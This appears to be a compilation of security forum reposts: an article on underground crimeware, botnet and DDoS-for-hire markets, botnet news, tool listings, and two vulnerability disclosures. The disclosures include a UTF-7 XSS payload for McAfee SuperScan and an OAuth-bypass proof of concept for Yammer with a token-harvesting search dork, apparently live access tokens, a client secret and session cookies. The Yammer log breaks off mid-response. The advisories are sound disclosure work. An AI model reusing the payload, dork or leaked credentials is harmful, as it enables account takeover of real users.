Cybercriminals offer botnet and related command and control servers hosted on cloud architectures for lease or sale; the compromised machines could be used to steal information from the victims (e.g., banking credentials, sensitive information) or to launch massive DDoS attacks against specific targets. The black market offers a huge quantity of options such as the anonymization services to hide the identity of attackers or different model of sale such as pay-per-execution of malware on a compromised machine or the renting of the infected PC for a limited period of time. Crimeware-as-a-Service (Black Market) Crimeware-as-a-service includes the identification and the design of the exploits used for the illegal operations, such as cyber espionage or sabotage. The category may also include development of tools and software to support the attack (e.g., keyloggers, bots) and to avoid malicious code detection (e.g., crypters, polymorphic builders). In many cases, criminal organizations also provide the hardware necessary for financial fraud such as card skimming; these devices are considered products in this category of illegal services. The underground provides various families of malicious code available for either sale or rent. The most popular are : Malware services Exploits Professional services Malware Services On the black market, it is possible to acquire numerous variants of malware. Many underground forums offer any kind of customization for well-known agents such as the Zeus Trojan. Criminals could decide to pay for a specific customization or to acquire the source code once released; this second option is ideal when there is a meaningful expertise in malware coding within the criminal gangs. Typical examples of malware services sold are : Spyware services for the provisioning of malicious software designed to spy on victims and gather sensitive information. The proposed applications are numerous and include any kind of technology from mobile to desktop. Rootkit services for the provisioning of malicious software designed to hide the presence of malware from the normal methods of detection and enable continued privileged access to victims. Ransomware services for the sale of applications that restrict the victim from using his machine until a specific action (usually payment of a ransom). Professional services include the outsourcing of development of exploits for specific vulnerabilities, an activity that requires a technical expertise. From Citadel to KINS In early 2012, security experts discovered the commercial distribution of the Zeus Trojan, a popular malware designed as an open project that can be customized with new features to meet customer demands. The Zeus Trojan is used by cybercriminals to steal banking information by logging keystrokes and form grabbing. It is spread mainly through phishing and drive-by downloads schemes. Many underground forums proposed an interesting model of sales based on direct contact with customers through forums and social networks used to collect information on bugs and request information regarding the commercial development of new features. The products were purchased in packages that provide ongoing support and evolutionary maintenance of source code to respond to customer needs. The most popular example of malware distribution was the Citadel, a Zeus offshoot, a web store advertised on several members-only forums that offered malicious hacker developments. Figure 1 – Citadel Malware The authors of Citadel proposed a common platform for content sharing based on a social network model. In fact, they offered to provide: A social network for customers, Citadel CRM Store, to allow users to be active players in the in product development. A social network for customers, Citadel CRM Store, to allow users to be active players in the in product development. Code sharing platform that allows each client to share its module and software code with others creating new modules or improvements. Promoting public proposals for software improvements and new features. Efficient Jabber instant message communication channel. The model introduced is an excellent example of malware-as-a-service, in particular for malware whose source code has been divulged in the underground. Groups of developers usually operate in the autonomous communities that take charge improving the illegal product to meet business needs. Following is a portion of Citadel description provided by the “Krebs on Security” blog: Just one year later, in early 2013, RSA discovered traces of a new banking Trojan named KINS. Security experts have followed the evolution of the malware in the underground community and they have found an announcement on the Russian black market for the new Trojan toolkit. The advertisement for the sale of KINS has been published on a closed Russian-speaking underground forum. According to RSA experts, the KINS trojan could have an impact on the banking ecosystem superior to its predecessors Spyeye and Zeus; it is the first public offer of similar malware since the Citadel malicious code was retired from cybercriminal commerce at the end of 2012. “This is the first actual commercial Trojan we’ve seen in a while, since Citadel was taken off the market. We haven’t seen anything serious enough on the part of malware developers. This is the first time something might materialize into a real, commercial banking Trojan” declared Limor Kessem, cybercrime specialist at RSA. Is the KINS Trojan linked to other malware such as Zeus or SpyEye? The advertisement for KINS found by RSA experts claims that the malicious code is a totally new project that is not derived from re-engineering of other malware source code. KINS has a modular structure. The basic offer includes a bootkit, a dropper, DLLs and Zeus-compatible Web injects. The authors sell KINS for $5,000 in its basic configuration and offer additional modules and plug-ins for $2,000 apiece. Figure 2 – KINS ad on the black market The bootkit component is considered of the most interesting features, since none of KINS predecessors were equipped with a bootkit. It is a volume boot record (VBR) designed to cover presence of the Trojan that will take hold of the infected computer from a much deeper level. The following key features are highlighted by RSA: KINS Trojan architecture is built like Zeus/SpyEye, with a main file and DLL-based plug-ins. KINS is compatible with Zeus web injections, the same as SpyEye. KINS Trojan comes with the anti-rapport plug-in that was featured in SpyEye. KINS will work with RDP (like SpyEye). KINS Trojan does not require technical savvy—much as Zeus doesn’t. Users in USSR countries will not be infected by KINS—a feature that was first introduced by Citadel in January 2012. Keeping KINS away from Trojan trackers—a problem that plagued SpyEye Spread via popular exploit packs such as Neutrino, using one of the most sophisticated packs out there. A bootkit in store—the Trojan will take hold of the infected computer from a much deeper level, its volume boot record (VBR). KINS will easily infect machines running Win8 and x64 operating systems. To have an idea of the cost of a bootkit, consider that the authors of Carberp Trojan offered it on the black market for $40,000, but KINS is the first commercial Trojan that comes with a built-in bootkit mode. Exploits The underground also offers a huge quantity of exploits that take advantage of known vulnerabilities and zero-days; their cost depends on various factors, such as the target system and type of flaw identified. The cybercriminals could decide to acquire an exploit or to rent it; for example the CritX toolkit was recently offered for $150 per day. The following image from the McAfee report shows details of exploits related to various systems. An exploit judged as high impact is approximately three times as expensive as those classified as low/moderate. The offer for exploit packs has different options. Many include encryption services to avoid detection by defense mechanisms, other propose testing malicious code against the principal antivirus programs on the market. These services are very useful because they allow testing the beta version of malware without spreading it in the wild. Early in 2013, Solutionary’s Security Engineering Research Team (SERT) published a study about an analysis of malware and exploit kits diffusion observed with its solution, ActiveGuard service platform. The analysis revealed that, despite the fact that there was a 15% drop in event volume in the categories of authentication security, distributed denial of service (DDoS) and reconnaissance, the cyber threat represented by exploit kits is increasing. The report revealed the surprising efficiency of well-known vulnerabilities that are usually part of popular exploits sold in the underground; around 60% of the total is more than two years old, and 70% of the exploit kits analyzed (26) were released or created in Russia. The most popular and pervasive exploit kit is BlackHole 2.0, which exploits fewer vulnerabilities than other kits do. Meanwhile, the most versatile of these is the Phoenix exploit kit, which supports 16 % percent of all vulnerabilities being exploited. Over 18% of the malware instances detected were directly attributed to the BlackHole exploit kit, which exploits known vulnerabilities in most popular applications, frameworks and browsers such as Adobe Reader, Adobe Flash and Java. Figure 5 – Popular Exploit kits Professional Services The cybercrime ecosystem provides also professional services such as code developing for malware and exploit kits designed to take advantage of a specific vulnerability. The outsourcing of malicious code development is not a new concept; cybercriminals have paid for the design of malware for different purposes. Other professional services available include translations of the content of phishing email or the content of phishing websites. The following table lists sample of some services and related prices, according researchers at Fortinet security firm. Cybercrime Infrastructure-as-a-Service (Black market) One of the most difficult and onerous tasks for novice cybercriminals is the delivery of exploits, since the activity need requires a wide network of compromised machines that can be used for the purpose. To assist criminals, the underground offers the possibility of renting a botnet to carry out illegal activities or renting entire platforms to host malicious content, such as bullet-proof hosting. The choice of a proper infrastructure is a critical aspect of criminal activities and it is strictly correlated with the nature of the attack that hackers need to carry out, from malicious content hosting to DDoS. It is relatively easy to rent a botnet in the underground; the offer usually provides many optional services and model of payment. A botnet could be used for sending spam, launching DoS, and distributing malware. The following image, provided by McAfee, shows the various costs for renting of botnet services and the various options available. Figure 6 – Botnet services Among the most requested services within the model dubbed cybercrime infrastructure-as-a-service there are the hosting services and spam services. Very often requested is bulletproof hosting, which are hosting services provided by some domain hosting or web hosting firms that allows their customer to upload and distribute any kind of material. The leniency of bulletproof hosting has been taken advantage of by spammers and providers of online gambling or pornography. A bulletproof host allows a content provider to bypass the laws or contractual terms of service regulating Internet content and service use in its own country of operation, as many of these “bulletproof hosts” are based “overseas.” Bulletproof hosting provides various levels of service, based on the specification of the system provided, varying from a few tens to several hundreds of dollars per month. Spam services are also very popular services in the underground. The offer includes the availability of mail relay for sending of million emails. The availabilities of a great number of infected machines translate into the availability of valuable resources and services to be marketed by cybercrime gaining considerable profits. Cybercriminals are offering malware-infected-hosts, also known as loads, in a model of sale that proposes the monetization of bot activities through its rent of the compromised systems. Of course, the services offered are totally customizable: Clients can choose the type of malware that infects the victims and their geographic location. It is possible, for example, to rent U.S.-based malware-infected hosts or machines in the European Union. Security expert Dancho Danchev wrote about a newly launched underground service offering access to thousands of malware-infected machine for upsetting prices. A thousand U.S.-based hosts costs $200, while for a thousand EU-based hosts the price varies between $60 and $120, and the price for a thousand international mix types of hosts is $20. The different prices applied are calculated based on purchasing power and long-term value of a malware-infected host. U.S. users are considered by cybercriminal organization the wealthiest. The pricing policy is very diffused, but in many cases the malicious services are sold to U.S. users at higher prices. I should add that probably there are also other considerations behind cost evaluation, such as the specific demand in limited areas and the cost to maintain alive a botnet in countries in which cyber security is more responsive. A few months ago security researchers from Symantec discovered malware-infected computers rented as proxy servers on the black market. Cybercriminals using malware were able to turn infected computers into SOCKS proxy servers to which access is then sold; they used a compromised host to power a commercial proxy service that tunnels potentially malicious traffic through them. Hacking-as-a-Service or Attack as a Service Cybercriminals could decide to acquire or rent malicious code for the attack or entire infrastructures such as a botnet, but another possibility is to outsource all of the attack activities. This option allows cybercriminals with minimal technical expertise to conduct any kind of attack. Of course, this practice costs more than others, despite the fact that security experts have also found offers of free services provided as a demonstration. A cybercriminal could pay for a hacking service to avoid conducting research on the targets and skipping the acquisition of necessary tools and architectures for the offensive. One of the most popular services offered in the underground is password cracking. Dancho Danchev recently profiled a WordPress/Joomla brute-forcing and account verification tool; following are some sample screenshots of the web-based tool: Figure 7 – WordPress/Joomla brute-forcing tool “This tool is just the tip of the iceberg on an ever-green market segment within the cybercrime ecosystem that continues to push new releases capable of launching brute-forcing attacks against any given Web property,” said Danchev. Danchev has highlighted in the underground the offer of similar tools, as very articulate, brute-forcing tools are very diffused, especially among the small gang of criminals and IT professionals that use them for testing purposes. DDoS services are also very popular in the cybercrime ecosystem. They are very easy to arrange but the magnitude of an attack depends on the number of machines involved. To skip the recruiting phase and botnet management, and to accelerate the activities, usually cybercriminals pay for a DDoS service for a limited period of time. DDoS service providers offer structures able to target victims with a huge volume of traffic to interfere with their normal business operations. The following picture shows the price list for a “Cheap Professional DDOS Service.” These services are usually very user-friendly, the attacker just needs to provide target references and choose the service to pay to start the attack. Figure 8 – DDoS service offered in the underground (McAfee) The cost for a DDoS is very cheap, just $5 per hour for an attack that could have a duration of 3 days. Attack as a Service—the IM DDOSS Case The attacks-as-a-service model has been observed by security firms for offering illegal offensive activities. Security experts at the Damballa security firm discovered in the past a group of Chinese hackers who was offering a service dubbed IM DDOSS; it was one of the first hacking services that could be rented. For criminals, it was very simple to subscribe to the service. By simply signing in, an attacker could attack any target; it must be considered that the dimension of the botnet managed by cybercriminals allowed them to conduct powerful offensives. Figure 9 – IMDDOS Botnet (Damballa) Damballa experts maintain that the site claims to only allow attacks against non-legitimate targets such as gambling sites and sites for the dissemination of pirated copies of software and media. Principal clients in this case are copyright holders that pay for attacks against illegal activities that damage their business. The IM DDOS site is written in Mandarin and is very easy to use: Users just have to select the target and the level of attacks against it and the service will do all the rest. According to the report published by Damballa, domains used by authors of IM DDOS botnet were registered on March 20, 2010, and in April the authors started testing the architecture in China. The botnet grew at a staggering speed despite the fact that security experts consider the malicious code not very sophisticated. The botnet “reached a production peak activity by the second week of August of 25,000 unique recursive DNS lookups/hour to the command-and-control (CnC) servers,” a traffic volume comparable to the Mariposa and Virut malicious architectures. Despite the high performance of the service and the best level of organization offered to the clients, the price for an attack is cheap. It ranges from $150 and $400 and the authors of the service also offer to crack e-mail passwords in less than 48 hours. In reality, the service providers have a very efficient offer, the prices for an attack on commission are very variable; it is also offering a series of services totally free with the intent to retain the customers. Research-as-a-Service (Graymarket) Research-as-a-Service is a unique category not necessary linked to illegal activities. The classic example is provided by commercial companies that sell knowledge of zero-day vulnerabilities to organizations that meet their eligibility criteria (e.g., law enforcement). Despite the legal implications of the sale of knowledge about zero-day vulnerabilities, the demand has grown at an impressive pace. The marketplace is open to private individuals and organizations that limit their sale to specific buyers, but it has to be considered that the intermediation role could also be assumed by individuals who sell such intellectual property to entity that not necessary respect same strict eligibility requirements with obvious consequences. Many researchers, once they have found a new flaw, prefer to offer their knowledge through the exploit brokering services to be facilitated during the sale. The prices for a zero-day vulnerability depend on different factors, such as the context of the sale. The knowledge of a flaw sold to an intelligence agency is surely more profitable than one sold to the industry; another factor could be the population of users impacted by the zero day. A flaw in commonly used software is considered very precious. To the research-as-a-service belong also all the activities of on-demand information gathering independently for the purpose. Typically, these services are used by cybercriminals to gather information on targets or to conduct a spamming campaign. Many services offer differentiation on geographic base and on the category of targets. There are forums that specialize in the sale of email accounts for sectors such as defense or industry. Meanwhile, other commercialized lists also account for generic phishing attacks. Recently “Krebs on Security” published an interesting post that highlighted the importance of properly protecting our email account. The author confirmed that, in the cybercrime underground, many sellers offer a collection of hacked email accounts and, in many cases the offer is profiled according to users’ needs. The analysis of price lists provides interesting insights from security experts. The following data shows various offers and the cost of each account. ITunes account for $8. Fedex.com, Continental.com and United.com accounts for $6. Groupon.com for $5. Hosting provider Godaddy.com for $4. Wireless providers Att.com, Sprint.com, Verizonwireless.com, and Tmobile.com for $4. Facebook and Twitter for $2.50. The market for stolen credentials is very prolific, active accounts at dell.com,overstock.com, walmart.com, tesco.com, bestbuy.com and target.com are sold for a price between $1 and $3. Figure 10 – Hacked email offer (Krebson Security) As explained, a hacked email account is very attractive for cyber espionage purposes to gather information on other accounts that are directly connected. It could be also used for spamming malicious code or to realize more or less tricky frauds based on social engineering techniques. As explained by Krebs, an individual could receive a message from his contact, the hacked email account, asking him to wire money somewhere, claiming the owner of the account was left without money in some part of the globe. Conclusion This article has described the trend in the underground to provide services, infrastructures, and tools to conduct illegal activities. The practice is very diffused and allows criminals to reduce time for an offensive, increasing their efficiency. The criminal underground daily offers new efficient services that could increase the capabilities of attackers. Offers are very complete and are able to respond to every need. As a result, the volume of cyber attacks is likely to increase; data from different security firms is confirming the forecast. The study of the dynamics of cybercrime ecosystem is critical to understand the evolution of cyber threats and evaluate proper countermeasures. References Attacks-as-a-Service, MaaS, FaaS different terms same success history https://www.damballa.com/downloads/r_pubs/Damballa_Report_IMDDOS.pdf New raise of Citadel malware...banking again under attack - Security Affairs Brute-forcing applications spotted in the wild ... pros and cons Zeus,software as a service - Implications for civil and military - Security Affairs http://www.fortinet.com/sites/default/files/whitepapers/Cybercrime_Report.pdf KINS trojan is threatening banking sector - Security Affairs Reflections on the Zero-Days Exploits market starting from Forbes's article - Security Affairs Botnets for rent, criminal services sold in the underground market - Security Affairs New underground service offers access to thousands of malware-infected hosts | Webroot Threat Blog - Internet Security Threat Updates from Around the World Public offer of Zeus FaaS service on social network - Security Affairs http://www.fortinet.com/sites/default/files/whitepapers/Cybercrime_Report.pdf The business behind a hacked email account https://csis.org/files/publication/60396rpt_cybercrime-cost_0713_ph4_0.pdf http://www.mcafee.com/us/resources/white-papers/wp-cybercrime-exposed.pdf Sursa Resources.InfosecInstitute.com

A new bruteforce botnet campaign has infected over 25,000 Windows machines with malware using an unknown infection method, according to Arbor Networks. Arbor Networks security researcher Matthew Bing reported detecting the password-guessing campaign, codenamed Fort Disco, confirming it has already infected several popular web tools, including Joomla and WordPress. "We've identified six related command-and-control (C&C) sites that control a botnet of over 25,000 infected Windows machines. To date, over 6,000 Joomla, WordPress, and Datalife Engine installations have been the victims of password-guessing," he wrote. Bing said the attack has several advanced features that make it next to impossible to fully track. "The malware alone can be picked apart by disassemblers, poked and prodded in a sandbox, but by itself offers no clues into the size, scope, motivation, and impact of the attack campaign. It's much like a historian finding a discarded weapon on an ancient battlefield. Several things can be inferred, but painting a complete picture is difficult," he wrote. The Arbor Networks researcher said the malware used in the campaign is equally elusive. "It's unclear exactly how the malware gets installed. We were able to find reference to the malware's original filename (maykl_lyuis_bolshaya_igra_na_ponizhenie.exe) that referred to Michael Lewis' book The Big Short: Inside The Doomsday Machine in Russian with an executable attachment," wrote Bing. "Another filename, proxycap_crack.exe, refers to a crack for the ProxyCap program. It's unclear if victims were enticed to run these files, and if so, if that is the only means of infection. The command and control sites did not offer additional clues as to the infection mechanism." Despite the campaign's detection-dodging powers, Bing said the company has had some luck forensically examining the damage it leaves behind once it has finished with its victims. He said the company believes the campaign is linked to six C&C sites and uses at least four malware variants. Each is designed to steal victims' passwords and post them online at a hidden location for collection and use by the criminals. Bing said the purpose of the password collection currently remains unclear, though it is undoubtedly only the first stage of a larger campaign as the criminals commonly left one of two dormant tools on their victims' systems. The first was a PHP-based redirector that could be used to direct browsers running Windows with either Internet Explorer, Firefox or Opera to a website linked to a Styx Exploit Kit. The second was a WordPress plugin, which could be used to import posts from a Tumblr blog. Password theft has been a growing problem within the security community. Numerous groups have been caught targeting professional forums, hoping to steal users' login details. Most recently attacks were detected on the Apple Developer and NASDAQ Community forums. Sursa V3.co.uk

Description : netsniff-ng is is a free, performant Linux network sniffer for packet inspection. The gain of performance is reached by 'zero-copy' mechanisms, so that the kernel does not need to copy packets from kernelspace to userspace. For this purpose netsniff-ng is libpcap independent, but nevertheless supports the pcap file format for capturing, replaying and performing offline-analysis of pcap dumps. netsniff-ng can be used for protocol analysis, reverse engineering and network debugging. Changes : Build system fixes and clean ups. Mausezahn man pages improvements. Compiler warnings fixed. Support for replaying/reading pcap capture files from/to tunnel devices. Author : Tobias Klauser, Daniel Borkmann Source : Netsniff-NG High Performance Sniffer 0.5.8 RC2 ? Packet Storm Download : Download: Netsniff-NG High Performance Sniffer 0.5.8 RC2 ? Packet Storm

Description : Network Interface Events Logging Daemon is a tool that receives notifications from the kernel through the rtnetlink socket, and generates logs related to link state, neighbor cache (ARP,NDP), IP address (IPv4,IPv6), route, FIB rules. Changes : This release adds traffic control support. Author : t2mune Source : NIELD (Network Interface Events Logging Daemon) 0.4.0 ? Packet Storm Download : Download: NIELD (Network Interface Events Logging Daemon) 0.4.0 ? Packet Storm

Description : MAC Changer is a GNU/Linux utility for viewing/manipulating the MAC addresses of network interfaces. It can set specific, random, vendor-based (with a 6600+ vendor list), and device-type-based MACs. Changes : This release fixed various important and less important issues. Author : github.com Source : GNU MAC Changer 1.6.0 ? Packet Storm Download : Download: GNU MAC Changer 1.6.0 ? Packet Storm

It’s not an easy decision trying to consider the security software best required for your system. There are a number of factors that you need to take in to account. There are a number of individual security applications from freeware developers, but if you want the ultimate protection, can you be assured that they’re going to be updated to fight against the latest virus and spyware threats? It was recently reported that a hacking group had produced malware encrypted so it was capable of getting behind even the best security software, so that’s a worrying trend. Another option we should consider if the history behind the developers. Some of the bigger brand names are not always the best available. The biggest brands sometimes suffer from negative press as their software can be cumbersome, require system resources beyond what you’d expect and can even affect how other software works on your system. BitDefender have been developing anti-virus technology for years. Indeed, their technology is often license to other brands and is an anti-virus engine that’s respected within the industry. BitDefender Internet Security is a complete suite of software you’ll require to protect your PC from the latest threats. The application contains features to prevent against unauthorised access to your WiFi network as well as a gamer mode that will protect against games who can be vulnerable when they connect to remote gaming-based networks. http://download.bitdefender.com/windows/installer/en-gb/bitdefender_isecurity.exe

Description : McAfee Superscan version 4.0 suffers from a cross site scripting vulnerability. Author : Piotr Duszynski Source : McAfee Superscan 4.0 Cross Site Scripting ? Packet Storm Code : Trustwave SpiderLabs Security Advisory TWSL2013-024: Cross Site Scripting (XSS) vulnerability in McAfee Superscan 4.0 Published: 08/02/2013 Version: 1.0 Vendor: McAfee (http://www.mcafee.com/) Product: SuperScan Version affected: v4.0 Product description: SuperScan 4 is a Windows port scanning tool used as a TCP port scanner, pinger and resolver. Finding 1: Cross-Side Scripting Vulnerability *****Credit: Piotr Duszynski @drk1wi of Trustwave SpiderLabs CVE: CVE-2013-4884 CWE: CWE-79 It is possible to inject UTF-7 encoded XSS payload to the SuperScan 4.0 generated port scan report, through a specially crafted server response. The injectable payload (partially UTF-7 encoded without parenthesis): +ADw-img src=x onerror='a setter=alert,a="UTF-7-XSS";'+AD4- XSS exploitation of McAfee SuperScan 4.0 can be automated with the Portspoof software. Remediation Steps: The vendor released a fix for this vulnerability. It is recommended to upgrade SuperScan to version 4.1. Revision History: 07/22/13 - Vulnerability disclosed to vendor 08/01/13 - Patch released by vendor 08/02/13 - Advisory published References: https://kc.mcafee.com/corporate/index?page=content&id=KB78992 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

Description : Microsoft Yammer Social Network suffered from a critical information disclosure vulnerability due to an insecure O-Auth 2 implementation. Author : Ateeq Khan Source : Microsoft Yammer Social Network O-Auth Bypass ? Packet Storm Code : Title: ====== Microsoft Yammer Social Network - oAuth Bypass (Session Token) Vulnerability Date: ===== 2013-08-04 References: =========== http://www.vulnerability-lab.com/get_content.php?id=1003 Microsoft Security Response Center (MSRC) ID: 15126 Video: http://www.vulnerability-lab.com/get_content.php?id=1043 View: http://www.youtube.com/watch?v=SwxWNvmOsU4 VL-ID: ===== 1003 Common Vulnerability Scoring System: ==================================== 9.3 Introduction: ============= Yammer, Inc. is a freemium enterprise social network service that was launched in 2008 and sold to Microsoft in 2012. Yammer is used for private communication within organizations or between organizational members and pre-designated groups, making it an example of enterprise social software. It originally launched as an enterprise microblogging service and now has applications on several different operating systems and devices. Access to a Yammer network is determined by a user`s Internet domain, so only those with appropriate email addresses may join their respective networks. Yammer is a secure, private social network for your company. Yammer empowers employees to be more productive and successful by enabling them to collaborate easily, make smarter decisions faster, and self-organize into teams to take on any business challenge. It is a new way of working that naturally drives business alignment and agility, reduces cycle times, engages employees and improves relationships with customers and partners. Pioneered Enterprise Social Networking when we launched in 2008 Among the fastest growing enterprise software companies in history, exceeding over four million users in just three years. Raised $142 million in venture funding from top tier firms Used by more than 200,000+ companies worldwide Built social from the ground up with ‘Facebook DNA’: Facebook’s Founding President, Sean Parker serves on Yammer’s Board of Directors Yammer and Facebook share the same first investor, Peter Thiel; backed by Social+Capital Partnership – a fund established by former Facebook Vice President, Chamath Palihapitiya. More than 80 percent of the Fortune 500® are using Yammer. Leading organizations including Ford, Nationwide, 7-Eleven, Orbitz Worldwide, Rakuten, and Telefonica O2 have adopted Yammer. Protocol Introduction: OAuth is an emerging authorization standard that is being adopted by a growing number of sites such as Twitter, Facebook, Google, Yahoo!, Netflix, Flickr, and several other Resource Providers and social networking sites. It is an open-web specification for organizations to access protected resources on each other`s web sites. This is achieved by allowing users to grant a third-party application access to their protected content without having to provide that application with their credentials. Unlike Open ID, which is a federated authentication protocol, OAuth, which stands for Open Authorization, is intended for delegated authorization only and it does not attempt to address user authentication concerns. There are several excellent online resources, referenced at the end of this article, that provide great material about the protocol and its use. Vendor Homepage: http://www.microsoft.com Product Homepage: https://www.yammer.com Abstract: ========= The Vulnerability Laboratory Research Team has discovered multiple critical Vulnerabilities in the Microsoft Yammer Social Network. Report-Timeline: ================ 2013-07-09: Researcher Notification & Coordination (Ateeq Khan) 2013-07-10: Vendor Notification (Microsoft Security Response Center) 2013-07-11: Vendor Response/Feedback (Microsoft Security Response Center) 2013-07-30: Vendor Fix/Patch (Microsoft Developer Team) 2013-08-04: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Microsoft Corporation Product: Yammer - Social Network Application 2013 Q2 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== An auth bypass session token web vulnerability is detected in the official Microsoft Yammer Social Network online-service application. The vulnerability allows remote attackers to bypass the token protection to compromise the account auth system of the web-application. [*] `Critical Information Disclosure` due to `Insecure Oauth 2 Implementation` resulting in `Auth Bypass.` The Oauth 2 protocol is all about authenticating the Client (consumer key and secret) and the User to the Server, but not the other way around. There is no protocol support to check the authenticity of the Server during the handshakes. So essentially, through phishing or other exploits, user requests can be directed to a malicious Server where the User can receive malicious or misleading payloads. This could adversely impact the Users, but also the Client and Server in terms of their credibility and bottom-line. It has been discovered that due to insecure implementation of OAuth on the Yammer network, it is possible to steal other user profiles by simply requesting a leaked access token which can be accquired from publically accessable search engine results. (Google`s Cache) and or by other possible means. During the testing, the researcher was able to accquire sensitive information (valid access_tokens) using Google search engine and upon further testing it was revealed that by including the access token directly in the browser through an HTTPS request, it is possible to log on to Yammer as the affected user. The session gets authenticated without entering the login/password credentials. Using the google search engine, the researchers was able to find a particular link listed publically in the results and upon requesting that link directly in the browser, the researcher was instantly logged in as the given `user` with full priviledges to the profile. We have explained all steps in the POC section for further analysis. Please note, We were able to find atleast 2 valid tokens using Google search engine cache results. The variable that is revealed publically is located in the Yammer API module in the /api/v1/messages?access_token=[Valid Token Here] parameter. The fact that search engine bots are able to capture live user session data / sensitive URL parameters in its cache which is publically accessable by everyone should be noticed and fixed immediately. Also the fact that by requesting the access token directly in your browser through HTTPS, it simply logs you in the Yammer social network as the affected user is also alarming. This vulnerability results in a complete compromise of the affected accounts, user profile and the associated risk is critical. Exploitation of the vulnerability requires no user interaction and also no registered Yammer account is required. To capture the session the attacker can use a random empty session as form to request. Vulnerable Service(s): [+] Microsoft Yammer Social Network Vulnerable Parameter(s): [+] api/access_token Proof of Concept: ================= The remote auth bypass vulnerability can be exploited by remote attacker without privileged application user account or user interaction. For demonstration or reproduce ... 1) Use the following Google dork to find the valid access tokens listed publically in the search engine cache results. Google Dork: site:yammer.com inurl:'access_token' 1) Open the POC link #1 in your browser https://www.yammer.com/api/v1/messages?access_token=NPLpzPsWdtCeXaKxBGA (You will be directly authenticated as the affected user upon requesting this link) 2) Open another browser tab and visit the Yammer social network website (https://www.yammer.com) 3) You will now be redirected to the user profile with full access and priviledges hence proving the existence of this vulnerability. PoC Link #2 https://www.yammer.com/api/v1/messages?access_token=cQ5AwEgUocADLNQPUncVuQ PoC Example: https://[SERVER]/[API]/[VERSION]/[FILE]?access_token=[Bypass] Note: you can use any of the Two given links mentioned above to reproduce this POC. Other sensitive links captured from search engine cache: https://www.yammer.com/oauth2/access_token?client_id=zlFlQNVPwAL2EdBefl8Ow&client_secret=3aUo5FpsU8oDqYW24NQtEFxtBniMM14Gt6m7lT6Lcs &code=GA8HWbcqk461mWOk4uLcQ https://www.yammer.com/ccure.it/signup/new_email_confirmation?activation_code=1g6tm-dmx85rk5l3ckijz6k2sz6x3ei --- PoC Request & Response Session Logs --- HTTP GET Request GET /api/v1/messages?access_token=cQ5AwEgUocADLNQPUncVuQ HTTP/1.1 Host: www.yammer.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Cookie: _workfeed_session_id=dd9fa728ce6dc861df3cba09e46dc800; yamtrak_id=fc24240f-5d58-40e9-a647-e1bed7232e5b; __utma=253772928.1821170373.1373278291.1373278291.1373316169.2; __utmc=253772928; __utmz=253772928.1373278291.1.1.utmcsr=(direct)| utmccn=(direct)|utmcmd=(none); WT_FPC=id=115.186.111.196-3513600256.30305614:lv=1373269393265:ss=1373269370644; WT_NVR=0=/: 1=enterprisesns.com; kvcd=1373316182244; km_ai=YKAMlAV8CfR7RVANZHFvRaE6psA%3D; km_uq=; km_lv=x; __ar_v4=BUIR53QGUNCHPAA5IDCCTB%3A20130707%3A3%7C5EWZRLDA4NDSLFONDMVGDZ%3 A20130707%3A3%7CF3JVO7OG3NEMZA2LRFRDZD %3A20130707%3A2%7CQF74DUYCSFC4HP47P56MLN%3A20130707%3A1; __utmb=253772928.2.10.1373316169; km_vs=1; browser_token=2be660391eb2600cf 5c4b4dfa3fa9f0d0515eb0d; unverified_email=ateeq%40ccure.it HTTP Response: HTTP/1.1 200 OK Server: nginx Date: Mon, 08 Jul 2013 20:51:37 GMT Content-Type: application/xml; charset=utf-8 Connection: keep-alive Status: 200 OK ETag: "250c045d140d9c3cfdc554d69e5c387e" Access-Control-Allow-Methods: OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, CONNECT, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, VERSION-CONTROL, REPORT, CHECKOUT, CHECKIN, UNCHECKOUT, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE-CONTROL, MKACTIVITY, ORDERPATCH, ACL, SEARCH, PATCH Cache-Control: max-age=0, private, must-revalidate X-UA-Compatible: IE=Edge,chrome=1 Access-Control-Allow-Headers: Content-Type, X-Requested-With, NETWORK_ID, Authorization, X-CSRF-Token Access-Control-Allow-Origin: https://ymodules.yammer.com X-Runtime: 0.444532 X-Date: 1373316697937 Access-Control-Allow-Credentials: true X-XSS-Protection: 1; mode=block Content-Length: 70544 <?xml version="1.0" encoding="UTF-8"?> <response> <meta> <current-user-id>10490568</current-user-id> <direct-from-body>false</direct-from-body> <followed-user-ids> <followed-user-id>10638646</followed-user-id> </followed-user-ids> <feed-name>Company Feed</feed-name> <realtime> <channel-id>MTozNTc3OTc6MzU3Nzk3</channel-id> 